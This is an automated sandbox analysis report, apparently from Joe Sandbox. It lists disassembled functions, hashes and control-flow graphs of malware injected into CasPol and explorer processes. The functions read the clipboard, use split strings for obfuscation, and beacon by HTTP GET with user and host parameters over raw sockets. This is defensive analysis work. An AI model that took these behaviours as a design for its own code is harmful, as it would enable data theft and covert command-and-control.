                                                                  • Opcode Fuzzy Hash: e5209865632caa4924a4e856eec222a46d13370c875d3e5f2a1d178611bc8339
                                                                  • Instruction Fuzzy Hash: BC90027170140403F100619948087470005A7E0342F51C012A5154596EC7B5C8917575
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439820 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08745e8ad9fcde46a932ef909c8bd24a5def59c3f0cf8b0ee65c2b1185a05556
                                                                  • Instruction ID: 7fd4ab7aae8e46b143d9d3afc29dacec6de5bb23e0f64dd5ea1a7cfaef9a4113
                                                                  • Opcode Fuzzy Hash: 08745e8ad9fcde46a932ef909c8bd24a5def59c3f0cf8b0ee65c2b1185a05556
                                                                  • Instruction Fuzzy Hash: 4590027174100403F141719944046060009B7E0281F91C013A0414595EC7A58A56BAA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439A80 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c9d46b0499ea50b47cfd36c210b83f9280b719ded4cb99420c3bcf623ee6c992
                                                                  • Instruction ID: a1b646e35d6a6fb2aabc786d40384e7016cde9ac0e01daa731b92654bfea5476
                                                                  • Opcode Fuzzy Hash: c9d46b0499ea50b47cfd36c210b83f9280b719ded4cb99420c3bcf623ee6c992
                                                                  • Instruction Fuzzy Hash: 1D90026170144443F14062994804B0F4105A7F1242F91C01AA4146595CCA6588556765
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014398A0 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f777e5e885f71c607facb13bff501872e188eaf4964ed40cbfa3f474ec024ec4
                                                                  • Instruction ID: 7d0959304eaebd735d3fa1fd365c152d7e5bf3ea98da1d5fd6dcae0b3f1fabf2
                                                                  • Opcode Fuzzy Hash: f777e5e885f71c607facb13bff501872e188eaf4964ed40cbfa3f474ec024ec4
                                                                  • Instruction Fuzzy Hash: CB90026170100403F102619944146060009E7E1385F91C013E1414596DC7758953B176
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:3.2%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:20.2%
                                                                  Total number of Nodes:104
                                                                  Total number of Limit Nodes:9
                                                                  execution_graph 8539 5aa64ab 8541 5aa64ae 8539->8541 8540 5aa74f2 9 API calls 8540->8541 8541->8540 8542 5aa6561 SleepEx 8541->8542 8543 5aa6578 8541->8543 8542->8541 8543->8543 8566 5aa3ed9 8567 5aa3f1c 8566->8567 8568 5aa3f44 socket 8566->8568 8567->8568 8516 5aa2fae 8517 5aa2ff7 8516->8517 8522 5aa2e62 8517->8522 8519 5aa313d 8526 5aa3f72 8519->8526 8521 5aa3b88 8523 5aa2e8e 8522->8523 8524 5aa2472 ObtainUserAgentString 8523->8524 8525 5aa2e9b 8524->8525 8525->8519 8527 5aa3f8d 8526->8527 8528 5aa3fd5 WSAStartup 8527->8528 8528->8521 8529 5a9f3ee 8531 5a9f3f3 8529->8531 8530 5a9f4a9 8531->8530 8532 5aa74f2 9 API calls 8531->8532 8532->8530 8451 5aa2e62 8452 5aa2e8e 8451->8452 8455 5aa2472 8452->8455 8454 5aa2e9b 8457 5aa24e4 8455->8457 8456 5aa255f 8456->8454 8457->8456 8458 5aa254e ObtainUserAgentString 8457->8458 8458->8456 8459 5a9f592 8460 5a9f5b3 8459->8460 8461 5a9f678 8460->8461 8462 5a9f5e2 SleepEx 8460->8462 8466 5aa0e22 8460->8466 8470 5aa64b2 8460->8470 8475 5a9f3f2 8460->8475 8462->8460 8462->8462 8467 5aa0e3b 8466->8467 8469 5aa0e7f 8466->8469 8468 5aa0e77 OpenClipboard 8467->8468 8467->8469 8468->8469 8469->8460 8473 5aa64e9 8470->8473 8471 5aa6578 8471->8460 8473->8471 8474 5aa6561 SleepEx 8473->8474 8479 5aa74f2 8473->8479 8474->8473 8476 5a9f40b 8475->8476 8478 5a9f4a9 8475->8478 8477 5aa74f2 9 API calls 8476->8477 8477->8478 8478->8460 8481 5aa7525 8479->8481 8480 5aa7ba0 8480->8473 8481->8480 8484 5aa75f1 8481->8484 8500 5aa3ee2 8481->8500 8483 5aa76bd 8483->8480 8487 5aa7748 8483->8487 8503 5aa4082 8483->8503 8484->8480 8484->8483 8486 5aa7693 getaddrinfo 8484->8486 8486->8483 8487->8480 8488 5aa7b6d 8487->8488 8499 5aa7cc0 8487->8499 8509 5aa4112 8488->8509 8490 5aa7d39 8492 5aa7d5a SleepEx 8490->8492 8494 5aa7d66 8490->8494 8493 5aa7e8f 8492->8493 8495 5aa4112 closesocket 8493->8495 8494->8493 8496 5aa7deb setsockopt recv 8494->8496 8495->8480 8496->8493 8497 5aa7e4e 8496->8497 8497->8493 8498 5aa7e57 recv 8497->8498 8498->8493 8498->8497 8506 5aa3ff2 8499->8506 8501 5aa3f1c 8500->8501 8502 5aa3f44 socket 8500->8502 8501->8502 8502->8484 8504 5aa40ba 8503->8504 8505 5aa40e2 connect 8503->8505 8504->8505 8505->8487 8507 5aa404f send 8506->8507 8508 5aa4027 8506->8508 8507->8490 8508->8507 8510 5aa416e closesocket 8509->8510 8511 5aa4144 8509->8511 8510->8480 8511->8510 8512 5a9f692 8513 5a9f6a9 8512->8513 8514 5a9f6f9 8513->8514 8515 5a9f6d3 CreateThread 8513->8515 8544 5aa12e1 8545 5aa12f4 8544->8545 8552 5aa2fb2 8545->8552 8548 5a9f3f2 9 API calls 8550 5aa1304 8548->8550 8549 5aa1380 8550->8549 8558 5a9f4e2 8550->8558 8553 5aa2ff7 8552->8553 8554 5aa2e62 ObtainUserAgentString 8553->8554 8555 5aa313d 8554->8555 8556 5aa3f72 WSAStartup 8555->8556 8557 5aa12fc 8556->8557 8557->8548 8559 5a9f587 8558->8559 8561 5a9f4ff 8558->8561 8559->8550 8560 5aa0e22 OpenClipboard 8562 5a9f577 8560->8562 8561->8559 8561->8560 8563 5aa64b2 10 API calls 8562->8563 8564 5a9f57f 8563->8564 8565 5a9f3f2 9 API calls 8564->8565 8565->8559 8533 5aa4106 8535 5aa4113 8533->8535 8534 5aa416e closesocket 8535->8534 8536 5aa3f66 8537 5aa3f7d 8536->8537 8538 5aa3fd5 WSAStartup 8537->8538

                                                                  Executed Functions

                                                                  Function 05AA74F2 Relevance: 27.1, APIs: 5, Strings: 10, Instructions: 829networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 5aa74f2-5aa7523 1 5aa7543-5aa7546 0->1 2 5aa7525-5aa7529 0->2 3 5aa754c-5aa7552 1->3 4 5aa7bd1-5aa7bde 1->4 2->1 5 5aa752b-5aa752f 2->5 3->4 6 5aa7558-5aa756c 3->6 5->1 7 5aa7531-5aa7535 5->7 8 5aa756e-5aa7572 6->8 9 5aa7574-5aa7575 6->9 7->1 10 5aa7537-5aa753b 7->10 8->9 11 5aa757f-5aa7588 8->11 9->11 10->1 12 5aa753d-5aa7541 10->12 13 5aa758a-5aa758e 11->13 14 5aa759f-5aa75a3 11->14 12->1 12->3 15 5aa75ab-5aa75d0 13->15 16 5aa7590-5aa759d 13->16 14->15 17 5aa75a5 14->17 18 5aa75d8-5aa75ec call 5aa3ee2 15->18 19 5aa75d2-5aa75d6 15->19 16->17 17->15 22 5aa75f1-5aa7613 18->22 19->18 20 5aa7619-5aa7620 19->20 23 5aa76d0-5aa76e0 20->23 24 5aa7626-5aa762e 20->24 22->20 27 5aa7bc1-5aa7bca 22->27 23->27 28 5aa76e6-5aa76f6 23->28 25 5aa765e-5aa7671 24->25 26 5aa7630-5aa7658 call 5a9f012 call 5aa6eb2 24->26 25->27 30 5aa7677-5aa767d 25->30 26->25 27->4 31 5aa76f8-5aa7709 call 5aa3e72 28->31 32 5aa7710-5aa7722 28->32 30->27 36 5aa7683-5aa7685 30->36 31->32 33 5aa7788-5aa77ad 32->33 34 5aa7724-5aa7743 call 5aa4082 32->34 40 5aa77af-5aa77ca call 5aa8342 33->40 41 5aa77cc-5aa77d0 33->41 44 5aa7748-5aa7770 34->44 36->27 42 5aa768b-5aa768d 36->42 56 5aa7814 call 5aa8342 40->56 48 5aa7bb1-5aa7bb2 41->48 49 5aa77d6-5aa77da 41->49 42->27 47 5aa7693-5aa76bb getaddrinfo 42->47 44->33 51 5aa7772-5aa777e 44->51 47->23 53 5aa76bd-5aa76c5 47->53 50 5aa7bb9-5aa7bba 48->50 49->48 54 5aa77e0-5aa77e4 49->54 50->27 51->50 55 5aa7784 51->55 53->23 57 5aa77ec-5aa7812 call 5aa8342 54->57 58 5aa77e6-5aa77ea 54->58 55->33 60 5aa7819-5aa78c9 call 5aa8312 call 5aa53a2 call 5aa5392 * 2 call 5aa8312 call 5aa47d2 call 5aa8532 56->60 57->56 58->57 58->60 77 5aa78cb-5aa78cf 60->77 78 5aa78dd-5aa793d call 5aa8342 60->78 77->78 79 5aa78d1-5aa78d8 call 5aa4cd2 77->79 83 5aa7943-5aa7982 call 5aa8312 call 5aa87c2 call 5aa8532 78->83 84 5aa7a36-5aa7b23 call 5aa8312 call 5aa87c2 * 4 call 5aa8532 * 2 call 5aa5392 * 2 78->84 79->78 98 5aa79a7-5aa79d8 call 5aa87c2 * 2 83->98 99 5aa7984-5aa79a3 call 5aa87c2 call 5aa8532 83->99 116 5aa7b28-5aa7b4c call 5aa87c2 84->116 112 5aa79da-5aa79ff call 5aa8532 call 5aa87c2 98->112 113 5aa7a04-5aa7a08 98->113 99->98 112->113 113->116 117 5aa7a0e-5aa7a31 call 5aa87c2 113->117 127 5aa7bdf-5aa7cba call 5aa87c2 * 7 call 5aa8532 call 5aa8312 call 5aa8532 call 5aa47d2 call 5aa4cd2 116->127 128 5aa7b52-5aa7b67 call 5aa87c2 call 5aa8532 116->128 117->116 142 5aa7b6d-5aa7baa call 5aa3d12 call 5aa4112 127->142 188 5aa7cc0-5aa7cc7 127->188 141 5aa7d0f-5aa7d3b call 5aa3ff2 128->141 128->142 150 5aa7d3d-5aa7d52 141->150 151 5aa7d66-5aa7d6a 141->151 142->48 150->151 154 5aa7d54-5aa7d58 150->154 155 5aa7d7e-5aa7d92 151->155 156 5aa7d6c-5aa7d70 151->156 154->151 161 5aa7d5a-5aa7d61 SleepEx 154->161 158 5aa7db0-5aa7e4c call 5aa8342 call 5aa8312 setsockopt recv 155->158 159 5aa7d94-5aa7daa 155->159 162 5aa7ea6-5aa7ee2 call 5aa4112 156->162 163 5aa7d76-5aa7d78 156->163 175 5aa7e4e 158->175 176 5aa7e8f-5aa7e9c 158->176 159->158 159->162 161->162 162->48 163->155 163->162 175->176 178 5aa7e50-5aa7e55 175->178 176->162 178->176 180 5aa7e57-5aa7e8d recv 178->180 180->175 180->176 189 5aa7cc9-5aa7cd0 188->189 190 5aa7cf1-5aa7cfc 188->190 191 5aa7ce8-5aa7cef 189->191 192 5aa7cd2-5aa7cde 189->192 190->141 193 5aa7cfe-5aa7d09 190->193 191->190 194 5aa7d0b-5aa7d0c 191->194 192->191 193->141 194->141
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: recv$Sleepgetaddrinfosetsockopt
                                                                  • String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
                                                                  • API String ID: 878647675-2045366144
                                                                  • Opcode ID: 6d402d88823ea19e2df587a1f31de408e7f4c2e71253bbe99036a4e7cb3e0988
                                                                  • Instruction ID: fca52a9231da94bc266ad41ffa255da47829e714c132621108fa62b0c19a214a
                                                                  • Opcode Fuzzy Hash: 6d402d88823ea19e2df587a1f31de408e7f4c2e71253bbe99036a4e7cb3e0988
                                                                  • Instruction Fuzzy Hash: C8528071218A088FDB69EF28D498FEBB3E2FB98304F54462ED49BD7142DF34A5468741
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA0E22 Relevance: 1.6, APIs: 1, Instructions: 63clipboardCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 329 5aa0e22-5aa0e35 330 5aa0e3b-5aa0e43 329->330 331 5aa0ec4-5aa0ec9 329->331 330->331 332 5aa0e45-5aa0e4d 330->332 332->331 333 5aa0e4f-5aa0e57 332->333 333->331 334 5aa0e59-5aa0e61 333->334 334->331 335 5aa0e63-5aa0e6b 334->335 335->331 336 5aa0e6d-5aa0e75 335->336 336->331 337 5aa0e77-5aa0e7d OpenClipboard 336->337 337->331 338 5aa0e7f-5aa0e95 337->338 340 5aa0eb9-5aa0ec0 338->340 341 5aa0e97-5aa0ea3 338->341 340->331 341->340 344 5aa0ea5-5aa0eb1 call 5aa0c02 341->344 344->340
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: ClipboardOpen
                                                                  • String ID:
                                                                  • API String ID: 2793039342-0
                                                                  • Opcode ID: 745962ed0e60235b729c147634a194dd063b9ef8d9cf040cceb8a21b140fd0ce
                                                                  • Instruction ID: 2ff5220c63c44cc12d7bc12c7a2fbcda0f45085a21dd7edaa2de6881422b17f7
                                                                  • Opcode Fuzzy Hash: 745962ed0e60235b729c147634a194dd063b9ef8d9cf040cceb8a21b140fd0ce
                                                                  • Instruction Fuzzy Hash: 0E111271119A098FDBA6AB2880CDBB572E1FF48305F5904B9941BCB1D2DB36C982D751
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA2472 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ObtainUserAgentString.URLMON(?,?,?,?,?,?,?,?,?,?,05AA2E9B), ref: 05AA2559
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: AgentObtainStringUser
                                                                  • String ID: -Age$User$nt: $on.d$urlm
                                                                  • API String ID: 2681117516-1987325725
                                                                  • Opcode ID: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                  • Instruction ID: f137f820a801e6cff2acb7ae2efd6c0add1dd85c39c47c03df07d49acd3b5857
                                                                  • Opcode Fuzzy Hash: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                  • Instruction Fuzzy Hash: A031B131B14A4D8BCF04EFA8D898AEEB7E1FF58205F40422AD85ED7240DF7886448785
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA4106 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 215 5aa4106-5aa4111 216 5aa415b-5aa4168 call 5aa6eb2 215->216 217 5aa4113-5aa4142 215->217 218 5aa416e-5aa4181 closesocket 216->218 217->218 219 5aa4144-5aa415a 217->219 219->216
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: closesocket
                                                                  • String ID: clos$esoc$ket
                                                                  • API String ID: 2781271927-3604069445
                                                                  • Opcode ID: 689451a6646ce39e451173c0dcf4c8f5c29d37e37dab8c7ddbdf120933efa901
                                                                  • Instruction ID: c7cbd8c8d5ced2bcb2515894d263ba07d18b8b428dbb72b32611ae09565e3fb3
                                                                  • Opcode Fuzzy Hash: 689451a6646ce39e451173c0dcf4c8f5c29d37e37dab8c7ddbdf120933efa901
                                                                  • Instruction Fuzzy Hash: 9E01F7B140CB444FDB40EF28E0C4B997BE0FB98300F14466DE59DCB246D77484468B07
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA4112 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 222 5aa4112-5aa4142 223 5aa416e-5aa4181 closesocket 222->223 224 5aa4144-5aa4168 call 5aa6eb2 222->224 224->223
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: closesocket
                                                                  • String ID: clos$esoc$ket
                                                                  • API String ID: 2781271927-3604069445
                                                                  • Opcode ID: d421c9c6720000eb262619b817ed4860d3db7c06d4e9d6bd0b1ff8f44343a4ef
                                                                  • Instruction ID: f11c4f564b1bd36ad31defa1f4a0260b8f8dbb16cf8dbd89c67f27c01ff65d7f
                                                                  • Opcode Fuzzy Hash: d421c9c6720000eb262619b817ed4860d3db7c06d4e9d6bd0b1ff8f44343a4ef
                                                                  • Instruction Fuzzy Hash: 40F0F9B151CB089FDB80EF28E088B69B7E1FB98314F54567DBA4ECB245C77484468B16
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA4082 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 228 5aa4082-5aa40b8 229 5aa40ba-5aa40dc call 5aa6eb2 228->229 230 5aa40e2-5aa4105 connect 228->230 229->230
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: connect
                                                                  • String ID: conn$ect
                                                                  • API String ID: 1959786783-716201944
                                                                  • Opcode ID: 8e6ee82cb52f8b496bef60ee2b46d6d5c6c48f9218987fc6b92af486adba5c92
                                                                  • Instruction ID: 24a9750f2f558a75aa01ad9492f32fdfcbe252563cc43c77c7878214dad94bfc
                                                                  • Opcode Fuzzy Hash: 8e6ee82cb52f8b496bef60ee2b46d6d5c6c48f9218987fc6b92af486adba5c92
                                                                  • Instruction Fuzzy Hash: 98012171518A088FCB94EF5CE088B547BE0FB58311F1581BEEA0DDB266C7B4C9818B85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA3F66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 233 5aa3f66-5aa3f7b 234 5aa3f8d-5aa3fab 233->234 235 5aa3f7d-5aa3f8b 233->235 236 5aa3fad-5aa3fcf call 5aa6eb2 234->236 237 5aa3fd5-5aa3ff0 WSAStartup 234->237 235->234 236->237
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: Startup
                                                                  • String ID: WSAS$tart
                                                                  • API String ID: 724789610-2426239465
                                                                  • Opcode ID: 02406650e447c1fa7574cd5d84556fafe90163be47b457b1ed939eb2c599c675
                                                                  • Instruction ID: 48525d260227b9b072360fb934c5124d108a95a9fbfe17edc3ab8a7053b04585
                                                                  • Opcode Fuzzy Hash: 02406650e447c1fa7574cd5d84556fafe90163be47b457b1ed939eb2c599c675
                                                                  • Instruction Fuzzy Hash: 1301B1711196048FCB40FF28D08CBA9BBE0FF48365F2541E9E50ADF265D3B48989C756
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA3F72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 240 5aa3f72-5aa3fab 242 5aa3fad-5aa3fcf call 5aa6eb2 240->242 243 5aa3fd5-5aa3ff0 WSAStartup 240->243 242->243
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: Startup
                                                                  • String ID: WSAS$tart
                                                                  • API String ID: 724789610-2426239465
                                                                  • Opcode ID: 1d4e0883fc1815f1912b8eb6048150167a70f4de8bbb156eb55e64cb1498d31e
                                                                  • Instruction ID: e8fe9b2fa69d37db7cb4b84680d1c843d86c97d568a5d03447084cc46b12ed10
                                                                  • Opcode Fuzzy Hash: 1d4e0883fc1815f1912b8eb6048150167a70f4de8bbb156eb55e64cb1498d31e
                                                                  • Instruction Fuzzy Hash: 65014471504A088FCB44EF1DD08CB69BBE0FB58351F1581E9E50DDF265C7748985C756
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05A9F592 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 246 5a9f592-5a9f5d6 call 5a9f012 call 5aa6eb2 251 5a9f678-5a9f68c 246->251 252 5a9f5dc-5a9f5de 246->252 253 5a9f5e2-5a9f5f3 SleepEx 252->253 253->253 254 5a9f5f5-5a9f607 253->254 255 5a9f609-5a9f60f 254->255 256 5a9f63d-5a9f643 254->256 255->256 257 5a9f611-5a9f626 call 5aa0002 255->257 256->253 258 5a9f645-5a9f64b 256->258 257->256 263 5a9f628-5a9f638 call 5a9fa42 257->263 258->253 260 5a9f64d-5a9f653 258->260 260->253 262 5a9f655-5a9f666 call 5aa0e22 call 5aa64b2 260->262 268 5a9f66b-5a9f673 call 5a9f3f2 262->268 263->256 268->253
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: K;y&
                                                                  • API String ID: 3472027048-1772047635
                                                                  • Opcode ID: fc810b80b542b816e3aa10076e14871e57494e43f3077854b27e7c2e52254b32
                                                                  • Instruction ID: 5d61a6e43a21c57502638a43a843ef985378c87009d0d1ad923ace5a5e6f9be9
                                                                  • Opcode Fuzzy Hash: fc810b80b542b816e3aa10076e14871e57494e43f3077854b27e7c2e52254b32
                                                                  • Instruction Fuzzy Hash: 71215335A08B9C8FCF59EF6890D8AA9B3E1FB94300F48066EC95FCB11ADB749441CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA3FF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 271 5aa3ff2-5aa4025 272 5aa404f-5aa4077 send 271->272 273 5aa4027-5aa4049 call 5aa6eb2 271->273 273->272
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: send
                                                                  • String ID: send
                                                                  • API String ID: 2809346765-2809346765
                                                                  • Opcode ID: ad2f236766122beffabcd4b5b327f90ff22d20bd1524373b1c646cf2a1e7c532
                                                                  • Instruction ID: 972d9cb344f36262ac0002e70696d3503152c311c662a9379cc3ae45d8651509
                                                                  • Opcode Fuzzy Hash: ad2f236766122beffabcd4b5b327f90ff22d20bd1524373b1c646cf2a1e7c532
                                                                  • Instruction Fuzzy Hash: 71015270618A0C8FCB94EF5CE048B1577E0FB58310F0545AED95DCB266C7B4D8818B85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA3ED9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 276 5aa3ed9-5aa3f1a 277 5aa3f1c-5aa3f3e call 5aa6eb2 276->277 278 5aa3f44-5aa3f65 socket 276->278 277->278
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: socket
                                                                  • String ID: sock
                                                                  • API String ID: 98920635-2415254727
                                                                  • Opcode ID: 058ccfd56d24ceccc8dc1cea945d912323acad01842a6f445d4708d9ecda25b1
                                                                  • Instruction ID: 5d667cb7ddc925df6d572485eb9dc4084ecf0e98ada2e2a194a689d20ec0486d
                                                                  • Opcode Fuzzy Hash: 058ccfd56d24ceccc8dc1cea945d912323acad01842a6f445d4708d9ecda25b1
                                                                  • Instruction Fuzzy Hash: 600180719186188FCB44EF5CD088F50BBE0EB58311F1A85ADDA4DDB262C3B4D985CB85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA3EE2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 281 5aa3ee2-5aa3f1a 282 5aa3f1c-5aa3f3e call 5aa6eb2 281->282 283 5aa3f44-5aa3f65 socket 281->283 282->283
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: socket
                                                                  • String ID: sock
                                                                  • API String ID: 98920635-2415254727
                                                                  • Opcode ID: b5e9fd95fd77712679bc77e5ed075a02168c95ac9186b881f1bc913899d51f34
                                                                  • Instruction ID: 218ee38a9e3815f78021f6dcccb48595ebe6084668e5dba776af19f52ca32124
                                                                  • Opcode Fuzzy Hash: b5e9fd95fd77712679bc77e5ed075a02168c95ac9186b881f1bc913899d51f34
                                                                  • Instruction Fuzzy Hash: 0E0171719186088FCB44EF5CD088F14BBE0EB5C311F1A81BEDA0DDB266C3B4C9858B85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 05AA64B2 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
